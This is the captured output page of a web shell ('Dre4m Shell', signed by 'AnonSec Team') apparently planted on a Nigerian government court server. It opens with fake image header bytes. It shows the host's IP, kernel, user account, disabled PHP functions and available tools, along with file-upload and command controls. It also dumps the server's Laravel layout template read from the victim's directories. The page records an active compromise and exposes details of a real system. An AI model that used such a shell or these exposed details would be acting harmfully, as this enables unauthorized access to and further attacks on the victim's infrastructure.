ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.221.86.138
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/2ea56154b26aa6ba7331019d0891e27f4852f9fb.php
<!DOCTYPE html>
<html>

<head>
    <meta name="csrf-token" content="<?php echo e(csrf_token()); ?>">
    <?php $url = $_SERVER['HTTP_HOST']; ?>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>
        NICN-GRP System
    </title>
    <!-- Tell the browser to be responsive to screen width -->
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <link rel="stylesheet" href="<?php echo e(asset('/assets/css/bootstrap.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('/assets/font-awesome/css/font-awesome.min.css')); ?>">
    <?php echo $__env->yieldContent('styles'); ?>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
    <link rel="stylesheet" href="<?php echo e(asset('/assets/css/AdminLTE.min.css')); ?>">
    <!-- AdminLTE Skins. Choose a skin from the css/skins
       folder instead of downloading all of them to reduce the load. -->
    <link rel="stylesheet" href="<?php echo e(asset('/assets/css/select2.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('/assets/css/_all-skins.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('/assets/css/admin.css')); ?>">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/selectize.js/0.12.6/css/selectize.min.css" />
    <link rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.12.4/css/bootstrap-select.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/selectize.js/0.12.6/js/selectize.js"></script>

    <link rel="stylesheet" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
    <link rel="stylesheet" href="/resources/demos/style.css">


    <style type="text/css">
        table th {
            width: auto !important;

        }



        @media  print {
            .noprint {
                display: none;
            }
        }

        @media  screen {}
    </style>
    <script type="text/javascript" src="<?php echo e(asset('/assets/js/number_to_word.js')); ?>"></script>

    <script>
        var murl = "<?php echo e(url('/')); ?>";
    </script>


    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

</head>

<body class="hold-transition skin-green sidebar-mini" onload="lookup();">
    
    <div class="wrapper">

        <header class="main-header hidden-print">
            <!-- Logo -->
            <a href="<?php echo e(url('/')); ?>" class="logo">
                <!-- mini logo for sidebar mini 50x50 pixels -->
                <span class="logo-mini">
                    NICN-GRP
                </span>
                <!-- logo for regular state and mobile devices -->
                <span class="logo-lg"><b>
                        NICN-GRP
                    </b></span>
            </a>
            <!-- Header Navbar: style can be found in header.less -->
            <nav class="navbar navbar-static-top">
                <!-- Sidebar toggle button-->
                <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </a>

                <div class="navbar-custom-menu">
                    <ul class="nav navbar-nav">
                        <!-- Messages: style can be found in dropdown.less-->

                        <!-- Notifications: Staff that are due for increment per division -->
                        

                        <!-- Notifications: New Staff Added to the system from Open Registry -->
                        
                        <!-- Tasks: style can be found in dropdown.less -->
                        <!-- The other dropdown notification goes here -->


                        <!-- End of other dropdown notification -->
                        <!-- User Account: style can be found in dropdown.less -->
                        <li class="user">


                            <span>
                                <?php if(!Auth::guest()): ?>
                                    
                                <?php endif; ?>
                            </span>
                            </a>
                        </li>


                        <li class="user">
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                                
                            </a>
                        </li>


                        <li class="dropdown user">
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                                <i class="fa fa-user"></i>
                                <span class="hidden-xs">
                                    <?php if(!Auth::guest()): ?>
                                        <?php echo e(Auth::user()->name); ?>

                                    <?php endif; ?>
                                </span>
                            </a>
                            <ul class="dropdown-menu dropdown-user">
                                <li><a href="<?php echo e(url('/user/editAccount')); ?>"><i class="fa fa-circle-o"></i> Edit
                                        Account</a></li>
                                <li><a href="<?php echo e(url('/logout')); ?>"><i class="fa fa-btn fa-sign-out"></i>Logout</a></li>
                        </li>
                        <!--//-->
                        <!--<li role="separator" class="divider"></li>
                 <li><a href="<?php echo e(url('/user-role/create')); ?>"><i class="fa fa-circle-o"></i> Create Role</a></li>
                 <li><a href="<?php echo e(url('/module/create')); ?>"><i class="fa fa-circle-o"></i> Create Module</a></li>
                 <li><a href="<?php echo e(url('/function/create')); ?>"><i class="fa fa-circle-o"></i> Create Function</a></li>
                 <li><a href="<?php echo e(url('/sub-function/create')); ?>"><i class="fa fa-circle-o"></i> Create Sub Function</a></li>
                 <li><a href="<?php echo e(url('/sub-module/create')); ?>"><i class="fa fa-circle-o"></i> Create Sub Module</a></li>
                 <li><a href="<?php echo e(url('/assign-module/create')); ?>"><i class="fa fa-circle-o"></i> Assign Module To Role</a></li>
                 <li><a href="<?php echo e(url('/user-assign/create')); ?>"><i class="fa fa-circle-o"></i> Assign User To Role</a></li>-->
                        <!--//-->
                    </ul>
                    </li>
                    </ul>
                </div>
            </nav>
        </header>

        <aside class="main-sidebar hidden-print">
            <section class="sidebar">
                <div class="user-panel">
                    <div class="pull-left image">
                        <!--<img src="http://njc.gov.ng/webFiles/images/njc-logo2.jpg" class="img-circle" alt="User Image">-->
                    </div>
                    <div class="text-center" style="color: white">
                        <p><?php echo $__env->make('MasterRolePermission.layout.getUserRoleName', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?></p>
                        <a href="#"><i class="fa fa-circle text-success"></i>online</a>
                    </div>
                </div>
                <!-- Dynamic User Route for user -->
                <?php echo $__env->make('MasterRolePermission.layout.userRouteLink', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
                <!-- Technical Admin Route only -->
                <?php echo $__env->make('MasterRolePermission.layout.adminRouteLink', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
            </section>
        </aside>

        <!-- Content Wrapper. Contains page content -->
        <div class="content-wrapper">
            <section class="content">

                <?php echo $__env->yieldContent('content'); ?>

            </section>
        </div>

        <!-- /.content -->

        <!-- /.content-wrapper -->
        <footer class="main-footer hidden-print">
            <div class="pull-right hidden-xs">
                <b>Designed by</b> <a href="http://mbrcomputers.net">MBR Computers</a>
            </div>
            <strong>Copyright &copy; <?php echo date('Y'); ?> .</strong> All rights
            reserved.
        </footer>
    </div>
    <!-- ./wrapper -->
    <script src="<?php echo e(asset('/assets/js/jQuery-2.2.0.min.js')); ?>"></script>
    <script src="<?php echo e(asset('/assets/js/bootstrap.min.js')); ?>"></script>
    <script src="<?php echo e(asset('/assets/js/app.min.js')); ?>"></script>
    <script src="<?php echo e(asset('/assets/js/demo.js')); ?>"></script>
    <script src="<?php echo e(asset('/assets/js/jquery.slimscroll.min.js')); ?>"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.12.4/js/bootstrap-select.min.js"></script>
    <script type="text/javascript">
        $('#input-tags2').selectize({
            plugins: ['restore_on_backspace'],
            delimiter: ',',
            persist: false,
            create: function(input) {
                return {
                    value: input,
                    text: input
                }
            }
        });

        function editfunc(a, b, c, d) {
            $(document).ready(function() {
                $('#bank').val(a);
                $('#Bankcode').val(b);
                $('#bankID').val(c);
                $("#editModal").modal('show');
            });
        }
    </script>

    <?php echo $__env->yieldContent('scripts'); ?>
    <!-- <script src="<?php echo e(asset('assets/js/jquery.cookie.js')); ?>"></script> -->
</body>

</html>
<?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/layouts/layout.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team